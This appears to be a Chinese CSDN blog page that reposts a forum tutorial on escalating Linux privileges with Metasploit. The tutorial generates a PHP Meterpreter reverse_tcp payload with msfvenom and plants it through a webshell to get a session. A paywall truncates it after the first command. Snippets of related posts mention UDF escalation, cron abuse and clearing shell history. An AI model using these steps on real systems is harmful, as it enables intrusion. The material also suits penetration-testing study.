msf php脚本提权,利用Metasploit提权Linux主机思路

最新推荐文章于 2024-06-17 19:18:53 发布
最新推荐文章于 2024-06-17 19:18:53 发布
阅读量705 收藏
点赞数
文章标签: msf php脚本提权

本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑

大晚上的写个文章不容易而且有点小冷

利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell  打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题

PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。

Metasploit的msfVENOM工具可以制作PHP Meterpreter

我们先用msf来生成一个msf php马子

[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=本机ip -f raw >/root/桌面/test.php

这里我来给各位解释一下

[AppleScript] 纯文本查看 复制代码-p 设置payload

-f 设置输出文件格式

本机ip是在内网中 你的kali主机的ip地址 我们可以通过 ifconfig 命令来查看

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2017-02-25 03-45-37屏幕截图.png (183.08 KB, 下载次数: 66)

2017-2-25 03:45 上传

由此可见我在内网中 我本机kali的ip地址是192.168.0.3那么我们来执行

[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/r

最低0.47元/天 解锁文章
weixin_39640904
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 753
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
MySQL 漏洞利用提权
weixin_50464560的博客
07-15 2474
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQL 的 UDF 提权、MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
zzz6583zz的博客
06-15 948
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
提权与内网渗透
VictorZhang
08-25 3895
权限在不同的应用中有不同的分类,安全相关的大致分为以下几种 1.匿名访问权限 2.来宾权限 3.用户权限 4.管理员权限 5.系统权限 电脑常见的的权限分为用户权限和管理员权限 例如普通用户权限会有很多限制,例如无法执行某些程序以及服务 Window基础命令 query user # 查看用户登录情况 whoami # 查看当前用户权限 systeminfo # 查看当前系统版本与补丁信...
Mysql—udf实战提权
qq_45927819的博客
03-17 2495
文章目录环境扫描端口扫描目录反弹shelllinux下udf提权方式一方式二 环境 raven : 192.168.137.137 kali: 192.168.137.128 扫描端口 nmap -sS -Pn -A -p- -n 192.1678.137.137 扫描目录 dirb http://192.168.137.137 关键信息: 存在目录vendor,version下对应的是PHPMailer的版本:5.2.16 百度搜索:PHPMailer < 5.2.18 远程代码执行漏洞(C
linux计划任务提权
2401_83659708的博客
06-17 621
发现有 chkrootkit 软件的脚本(rootkit 是黑客用来入侵的工具,chkrootkit是用来检查 rootkit 是否存在的)发现支持 PUT 方法,利用 PUT 文件上传。-- snip -- 假如不是弱口令游戏继续。history -r #删除当前会话历史记录。获得版本信息可以网上搜索看是否存在公开漏洞。msf 成功上线拿到普通用户。
提权学习:Metasploit 权限提升总结
bylfsj的博客
10-15 976
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,...
【靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 4212
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
Metasploit 生成各种后门
热门推荐
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
渗透测试提权指南
遇事不决冲冲冲
12-04 7432
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
常见windwos提权笔记
03-30
- **提权至root用户**: 类似于Windows中的提权概念,在Linux系统中则是将普通用户提升至拥有最高权限的root用户。 #### 五、常见提权环境介绍 ##### 5.1 Webshell - **定义**: Webshell是通过Web应用漏洞上传到...
linuxMetasploit
04-06
linuxMetasploit,支持各个linux发行版本,一键安装,一键日穿内网
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
### Metasploit生成Linux木马并尝试提权 #### 一、课程背景与目标 本课程旨在通过实际操作,向学员展示如何利用Metasploit框架生成Linux木马,并尝试进行权限提升的过程。通过本课程的学习,学员将能够掌握以下...
linux系统安装msf的过程详解
09-14
Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
前端分析-202307110039
最新发布
07-29
前端分析-202307110039
Oracle中文基础PPT
07-29
Oracle中文基础PPT 虽然是10g,但是学习Oracle,10g版本没问题 Less01_DB_Architecture_MB3.ppt Less02_Installation_MB3.ppt Less03_DB_DBCA_MB3.ppt Less04_Instance_TB3.ppt Less05_Storage_TB3.ppt Less06_Users_MB3.ppt Less07_Schema_TB3.ppt Less08_Data_TB3.ppt Less09_Undo_TB3.ppt Less10_Security_MB3.ppt Less11_Network_MB3.ppt Less12_ProactiveM_MB3.ppt Less13_Performance_TB3.ppt Less14_BR_Concepts_MB3.ppt Less15_Backups_TB3.ppt Less16_R
【创新未发表】Matlab实现粒子群优化算法PSO-Kmean-Transformer-BiLSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
msf提权linux
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值